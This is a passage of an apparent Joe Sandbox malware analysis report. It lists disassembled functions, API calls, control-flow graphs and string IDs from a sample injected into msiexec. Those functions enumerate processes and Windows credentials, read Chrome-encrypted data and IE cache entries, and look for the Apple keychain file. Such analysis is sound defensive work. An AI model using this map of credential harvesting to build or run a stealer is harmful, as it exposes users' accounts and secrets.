                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                    • API String ID: 708747863-3398334509
                                                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                    Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                                                                    APIs
                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                    • memset.MSVCRT ref: 00413D7F
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                    • memset.MSVCRT ref: 00413E07
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                    • free.MSVCRT ref: 00413EC1
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                    • API String ID: 1344430650-1740548384
                                                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                    Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                    Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                    • free.MSVCRT ref: 00418803
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                    • String ID:
                                                                    • API String ID: 1355100292-0
                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                    Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1690352074-0
                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                    Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041898C
                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystemmemset
                                                                    • String ID:
                                                                    • API String ID: 3558857096-0
                                                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                    Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004455C2
                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 0044570D
                                                                    • memset.MSVCRT ref: 00445725
                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    • memset.MSVCRT ref: 0044573D
                                                                    • memset.MSVCRT ref: 00445755
                                                                    • memset.MSVCRT ref: 004458CB
                                                                    • memset.MSVCRT ref: 004458E3
                                                                    • memset.MSVCRT ref: 0044596E
                                                                    • memset.MSVCRT ref: 00445A10
                                                                    • memset.MSVCRT ref: 00445A28
                                                                    • memset.MSVCRT ref: 00445AC6
                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    • memset.MSVCRT ref: 00445B52
                                                                    • memset.MSVCRT ref: 00445B6A
                                                                    • memset.MSVCRT ref: 00445C9B
                                                                    • memset.MSVCRT ref: 00445CB3
                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                    • memset.MSVCRT ref: 00445B82
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                    • memset.MSVCRT ref: 00445986
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                    • API String ID: 2263259095-3798722523
                                                                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                    Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                    • API String ID: 2744995895-28296030
                                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                    Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                    • memset.MSVCRT ref: 0040B756
                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                    • memset.MSVCRT ref: 0040B851
                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    • memset.MSVCRT ref: 0040BB53
                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                    • String ID: chp$v10
                                                                    • API String ID: 4290143792-2783969131
                                                                    • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                    • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                    APIs
                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                    • free.MSVCRT ref: 0040E49A
                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                    • memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                    • API String ID: 3849927982-2252543386
                                                                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004091E2
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
